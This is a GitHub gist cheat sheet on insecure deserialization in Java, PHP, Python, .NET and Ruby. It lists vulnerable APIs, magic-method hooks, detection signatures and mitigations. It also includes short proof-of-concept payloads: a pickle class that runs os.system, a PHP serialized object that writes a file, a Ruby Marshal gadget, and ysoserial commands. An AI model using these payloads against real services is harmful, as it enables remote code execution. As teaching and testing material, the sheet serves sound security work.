Skip to content

Instantly share code, notes, and snippets.

@aravindkumarsvg

aravindkumarsvg/insecure_deserialization.md

Created February 2, 2026 02:39
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save aravindkumarsvg/34076796771833c57994ce40b3086ff8 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save aravindkumarsvg/34076796771833c57994ce40b3086ff8 to your computer and use it in GitHub Desktop.
Download ZIP
Insecure Deserialization
Raw
insecure_deserialization.md

Insecure Deserialization & Gadget Chains — Cheat Sheet

Core Concept

Insecure deserialization occurs when untrusted data is deserialized into objects, allowing attackers to abuse object lifecycle methods and existing code paths (gadgets) to trigger unintended behavior such as RCE.

Attackers inject object graphs, not code.

Key Terms

  • Serialization: Object → bytes/string
  • Deserialization: Bytes/string → object
  • Gadget: Existing class/method with a useful side effect
  • Gadget Chain: Sequence of gadgets automatically triggered
  • Sink: Dangerous operation (exec, eval, file write)

Why It’s Dangerous

Deserialization can implicitly invoke:

  • Constructors
  • Magic methods
  • Lifecycle callbacks
  • Reflection-based invocation

Language-wise Breakdown with Examples

Java

Dangerous API

ObjectInputStream ois = new ObjectInputStream(input);
ois.readObject();

Execution Hooks

  • readObject()
  • readResolve()
  • finalize()

Example Gadget Chain (CommonsCollections)

readObject()
 → HashMap.readObject()
   → Transformer.transform()
     → Runtime.getRuntime().exec("id")

Tool

ysoserial CommonsCollections1 "id"

Impact

💥 Remote Code Execution

PHP

Dangerous API

unserialize($_COOKIE['session']);

Execution Hooks

  • __wakeup
  • __destruct
  • __toString

Example

class Logger {
  public $file;
  function __destruct() {
    file_put_contents($this->file, "pwned");
  }
}

Serialized Payload

O:6:"Logger":1:{s:4:"file";s:12:"/tmp/pwned";}

Impact

📂 Arbitrary file write / RCE

Python

Dangerous API

pickle.loads(user_input)

Execution Hook

  • __reduce__

Example

import os, pickle
class Evil:
    def __reduce__(self):
        return (os.system, ("id",))
pickle.dumps(Evil())

Impact

💥 Remote Code Execution

C# / .NET

Dangerous APIs

  • BinaryFormatter
  • LosFormatter
  • NetDataContractSerializer

Example Vulnerable Code

BinaryFormatter bf = new BinaryFormatter();
bf.Deserialize(stream);

Execution Hooks

  • ISerializable
  • IDeserializationCallback
  • [OnDeserialized]

Example Gadget Chain

Deserialize()
 → ObjectDataProvider.OnDeserialized()
   → Process.Start("calc.exe")

Tool

ysoserial.net -f BinaryFormatter -g ObjectDataProvider -c calc.exe

Special Case: ASP.NET ViewState

__VIEWSTATE → LosFormatter → Gadget Chain → RCE

Ruby

Dangerous API

Marshal.load(user_input)

Execution Hooks

  • _load
  • marshal_load
  • initialize

Example

class Evil
  def self._load(data)
    system("id")
  end
end
Marshal.dump(Evil)

Rails Session Risk

Cookie → Marshal.load → Gadget Chain → RCE

High-Risk Indicators (VAPT)

Serialized Signatures

  • Java: AC ED 00 05
  • PHP: O: a:
  • Python: Pickle binary blobs
  • .NET: AAEAAAD
  • Ruby: \x04\x08

Common Attack Vectors

  • Cookies
  • ViewState
  • Hidden form fields
  • API parameters
  • Headers

Mitigation Checklist

❌ Never deserialize untrusted data using native serializers
✅ Use JSON with strict schemas
✅ Implement class allow-lists
✅ Sign and encrypt session data
✅ Remove dangerous libraries

One-Line Takeaway

Insecure deserialization abuses object lifecycles and existing code paths (gadgets) to reach dangerous sinks without injecting code.

References

  • OWASP Top 10
  • CWE-502
  • ysoserial / ysoserial.net
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment